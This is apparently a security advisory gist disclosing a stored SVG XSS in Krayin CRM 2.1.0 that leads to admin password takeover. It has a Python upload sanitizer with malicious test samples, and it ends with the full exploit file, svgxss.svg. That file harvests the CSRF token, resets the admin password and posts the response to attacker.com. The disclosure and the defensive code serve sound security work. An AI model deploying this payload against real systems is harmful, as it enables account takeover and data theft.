@shellkraft
Created April 2, 2025 13:32
Privilege Escalation via Malicious SVG File

Summary

A security vulnerability has been identified in Krayin CRM 2.1.0 that allows a low-privileged user to escalate privileges by tricking an admin into opening a malicious SVG attachment. The attachment is served from the CRM's own origin, so JavaScript embedded in the SVG runs in the admin's browser with the admin's session (stored XSS via SVG) and uses that position to forge an authenticated request:

  • It reads the admin's XSRF-TOKEN cookie, which is readable by script by design, and replays it in the X-XSRF-TOKEN header, so the request passes the CSRF check.
  • It changes the admin's password through the user-edit endpoint, which accepts a new password without asking for the current one.

The result is full admin account takeover and exposure of all CRM data.


Technical Details

Vulnerability Type

  • Stored XSS via SVG attachment, used to forge an authenticated same-origin request (the CSRF token is harvested from the cookie, so the CSRF protection is bypassed rather than absent)
  • Broken Access Control (Password Change Without Current Password)

Affected Component

  • User Management Module (/admin/settings/users/edit/[ID])
  • File Upload/Email Attachment Handling (SVG with embedded JavaScript)

Attack Flow

  1. Attacker (low-privilege user) sends an email with a malicious SVG attachment to an admin.
  2. Admin opens the attachment in a new tab. The CRM serves it inline from its own origin, so the browser renders it as an SVG document instead of downloading it.
  3. JavaScript inside the SVG executes with the admin's session and reads the XSRF-TOKEN cookie through document.cookie (the cookie is not HttpOnly because the front end is meant to read it).
  4. The script sends a same-origin POST (with _method=put) to /admin/settings/users/edit/[ID], carrying the decoded token in the X-XSRF-TOKEN header and a new password. The session cookie is attached automatically and the current password is never requested.
  5. Attacker logs in as the admin with the new password.

Proof of Concept (PoC)

  • Screen recording of the exploit in action:
    Exploit Demonstration

  • Malicious SVG file: svgxss.svg (attached to this advisory and reproduced below)


Impact

  • Full Admin Account Takeover: Attacker sets a new admin password and logs in.
  • Data Breach: Access to sensitive CRM data (customer info, transactions, etc.).
  • Persistence: Attacker can create backdoor accounts or modify system settings.

Root Cause Analysis

Missing SVG Sanitization and Unsafe Attachment Delivery

  • The CRM accepts SVG files containing <script> and serves them inline from the application origin, so the embedded script runs with the viewer's session. Either rejecting or stripping active content on upload, or serving attachments with Content-Disposition: attachment (or from a separate, cookie-less origin), breaks the chain.

Broken Password Change Logic

  • The /admin/settings/users/edit/[ID] endpoint sets a new password without verifying the current one, so any request that carries a valid session and CSRF token can rotate the credential. Credential changes should require re-authentication with the current password.
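A server-side gatekeeper for the first root cause, added here as an illustration and not taken from Krayin (which is a PHP application; the logic ports directly). The function names, the sample SVGs and the finding strings are all constructed for this example; EXPLOIT_SVG is a trimmed stand-in for the gist's svgxss.svg. It parses the upload with a real XML parser rather than grepping the bytes, so entity-encoded payloads such as &#106;avascript: are examined in decoded form, and it refuses the whole file (fail closed) instead of trying to strip pieces out.

```python
"""Reject SVG uploads that carry active content (fail closed).

Added example, not Krayin's code. A check like this belongs in the
upload/attachment handler, before the file is stored. Samples below are
constructed; EXPLOIT_SVG is a trimmed stand-in for the gist's svgxss.svg.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
XML_NS = "http://www.w3.org/XML/1998/namespace"
ALLOWED_NS = {SVG_NS, XLINK_NS, XML_NS, ""}

# Elements that run script or embed a foreign (HTML) document.
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "handler"}
# Attributes whose value is a URL the renderer follows; from/to/values cover
# <set>/<animate> rewriting an href at runtime.
URL_ATTRS = {"href", "src", "from", "to", "values"}
FORBIDDEN_SCHEMES = ("javascript:", "vbscript:", "data:")
CSS_URL = re.compile(r"url\(\s*['\"]?\s*([^'\")\s]*)", re.I)


def _split(qname):
    """ElementTree encodes names as '{ns}local'; return (ns, local)."""
    if qname.startswith("{"):
        ns, local = qname[1:].split("}", 1)
        return ns, local
    return "", qname


def _normalize_url(value):
    # Browsers ignore control characters and whitespace inside a scheme, so
    # "java\tscript:" still executes; strip them before comparing.
    return re.sub(r"[\x00-\x20]", "", value).lower()


def _css_external_refs(css):
    refs = ["@import"] if "@import" in css.lower() else []
    refs += [m.group(1) or "url()" for m in CSS_URL.finditer(css)
             if not m.group(1).startswith("#")]
    return refs


def audit_svg(data):
    """Return a list of findings; an empty list means the file passed."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    # A DOCTYPE enables entity tricks and an xml-stylesheet PI loads external
    # CSS; the parser below drops both silently, so refuse them up front.
    if re.search(rb"<!DOCTYPE|<\?xml-stylesheet", data, re.I):
        return ["DOCTYPE or xml-stylesheet processing instruction present"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    ns, local = _split(root.tag)
    if (ns, local) != (SVG_NS, "svg"):
        findings.append(f"root element <{local}> in namespace {ns!r} is not an SVG root")

    for el in root.iter():
        ns, local = _split(el.tag)
        if ns not in ALLOWED_NS:
            findings.append(f"foreign-namespace element <{local}> ({ns})")
        if local in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{local}>")
        if local == "style":
            findings += [f"<style> loads external resource {r}"
                         for r in _css_external_refs(el.text or "")]
        for attr, value in el.attrib.items():
            aname = _split(attr)[1]
            if aname.lower().startswith("on"):  # onload, onclick, onbegin, ...
                findings.append(f"event handler {aname} on <{local}>")
            elif aname in URL_ATTRS and _normalize_url(value).startswith(FORBIDDEN_SCHEMES):
                findings.append(f"{aname} on <{local}> uses forbidden scheme: {value!r}")
            elif aname == "style":
                findings += [f"style on <{local}> loads external resource {r}"
                             for r in _css_external_refs(value)]
    return findings


def is_safe_svg(data):
    return audit_svg(data) == []


# Constructed samples: one benign file and four active-content variants.
BENIGN_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
              '<rect width="100" height="100" fill="white"/>'
              '<text x="10" y="20" font-size="10">Loading...</text></svg>')
EXPLOIT_SVG = ('<svg xmlns="http://www.w3.org/2000/svg"><script type="text/javascript">'
               "//<![CDATA[\nfetch('/admin/settings/users/edit/1', {method: 'POST'});\n//]]>"
               '</script></svg>')
ONLOAD_SVG = '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>'
ENCODED_HREF_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
                    '<a xlink:href="&#106;ava&#9;script:alert(1)"><text y="15">click</text></a></svg>')
FOREIGN_OBJECT_SVG = ('<svg xmlns="http://www.w3.org/2000/svg"><foreignObject>'
                      '<body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(1)"/>'
                      '</body></foreignObject></svg>')

if __name__ == "__main__":
    for name, svg in [("benign", BENIGN_SVG), ("exploit", EXPLOIT_SVG), ("onload", ONLOAD_SVG),
                      ("encoded href", ENCODED_HREF_SVG), ("foreignObject", FOREIGN_OBJECT_SVG)]:
        print(f"{name}: {'ACCEPT' if is_safe_svg(svg) else 'REJECT'} {audit_svg(svg)}")
```

Upload filtering is defence in depth, not the whole fix: even a file that passes should be served with Content-Disposition: attachment, or from a separate cookie-less origin with a Content-Security-Policy of sandbox; script-src 'none', so that a filter gap never again puts script on the application origin. In production, parse with a hardened parser such as defusedxml rather than the bare standard-library module.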

Conclusion

This vulnerability poses a critical risk to the CRM's security: an attacker who can get one admin to open an attachment takes over that account with a single request. Both issues (inline delivery of unsanitized SVG, and a password change that does not require the current password) should be fixed, since either one alone still leaves a weakness.

svgxss.svg
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100" viewBox="0 0 100 100">
  <!-- Decoy content so the file looks like a harmless image while the script runs -->
  <rect width="100" height="100" fill="white"/>
  <text x="10" y="20" font-family="Arial" font-size="10" fill="black">Loading...</text>
  <script type="text/javascript">
  //<![CDATA[
  // The CDATA section lets the script contain < and & without breaking the XML.

  // Read a cookie by name. XSRF-TOKEN is deliberately not HttpOnly, so a script
  // running on the CRM origin can read it.
  function getCookie(name) {
    const value = `; ${document.cookie}`;
    const parts = value.split(`; ${name}=`);
    if (parts.length === 2) return parts.pop().split(';').shift();
  }

  // Harvest the admin's CSRF token (the framework stores it URL-encoded).
  const xsrfToken = getCookie('XSRF-TOKEN');

  // Rebuild the form the user-edit page submits, with a new password.
  const formData = new FormData();
  formData.append('id', '1');
  formData.append('name', 'Admin Compromised');
  formData.append('email', 'admin@example.com');
  formData.append('password', 'hacked123');          // New password
  formData.append('confirm_password', 'hacked123');  // Confirm new password
  formData.append('role_id', '1');
  formData.append('view_permission', 'global');
  formData.append('groups[]', '1');
  formData.append('status', '1');
  formData.append('_method', 'put');                 // Method spoofing: the POST is handled as PUT

  // Same-origin request: the session cookie is sent automatically and the
  // decoded token in X-XSRF-TOKEN satisfies the CSRF check.
  fetch('/admin/settings/users/edit/1', {
    method: 'POST',
    headers: {
      'X-XSRF-TOKEN': decodeURIComponent(xsrfToken),
      'Accept': 'application/json, text/plain, */*',
      'X-Requested-With': 'XMLHttpRequest'
    },
    body: formData
  })
    .then(response => response.json())
    .then(data => {
      // Optional: exfiltrate the server's response to the attacker
      fetch('https://attacker.com/collect', {
        method: 'POST',
        body: JSON.stringify(data)
      });
    })
    .catch(error => {
      console.error('Error:', error);
    });
  //]]>
  </script>
</svg>
@shellkraft (author comment)

krayin.mp4